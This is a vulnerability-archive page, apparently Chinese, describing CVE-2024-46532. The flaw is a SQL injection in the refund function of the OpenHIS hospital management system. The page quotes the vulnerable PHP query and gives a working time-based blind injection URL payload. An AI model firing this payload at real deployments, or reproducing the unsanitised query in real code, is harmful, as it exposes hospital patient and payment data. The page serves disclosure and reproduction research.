POC详情: 575bbfabe718781d61df46e0c9f3f423151f5ee3

来源
关联漏洞
标题: OpenHIS 安全漏洞 (CVE-2024-46532)
描述:OpenHIS是中国新致(OpenHIS)公司的一个基于 web 的医院管理应用程序。 OpenHIS v.1.0版本存在安全漏洞,该漏洞源于PayController.class.php组件中的退款功能包含一个SQL注入漏洞。
描述
Reproduction of SQL Injection Vulnerabilities in OpenHIS
介绍
# CVE-2024-46532
Reproduction of SQL Injection Vulnerabilities in OpenHIS

Vulnerabilities:OpenHIS-master/Application/His/Controller/PayController.class.php

SourceLink:https://github.com/1638824607/OpenHIS?tab=readme-ov-file

Vulnerability code:
    public function refund()
    {
        $paylog_id = I('get.paylog_id',0);
    
        $amount = I('post.amount','all');//all就是是全部
        $adm_uid = I('post.adm_uid',0);//all就是是全部
        $adm_memo = I('post.adm_memo','退款');//all就是是全部
    
        if(!$paylog_id||!$amount)$this->resJSON(1,'参数缺失:paylog_id or amount');
    
        #todo 这里需要添加功能权限,无权限不能使用
    
        $sql = "SELECT a.*,b.hospital_id,b.type_id,b.order_code,b.ol_pay_part,b.amount,b.patient_id FROM ".$this->tab_pre."his_care_paylog a LEFT JOIN ".$this->tab_pre."his_care_pkg b ON a.pkg_id=b.id WHERE a.id='$paylog_id' LIMIT 1";
    
        $r = $this->db->query($sql);
        if(!$r)$this->resJSON(2,'paylog_id无效',$sql);

POC:
  /index.php/pay/refund?paylog_id=aaaa'+or+sleep(.6)+--+

文件快照

[4.0K] /data/pocs/575bbfabe718781d61df46e0c9f3f423151f5ee3 └── [1.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。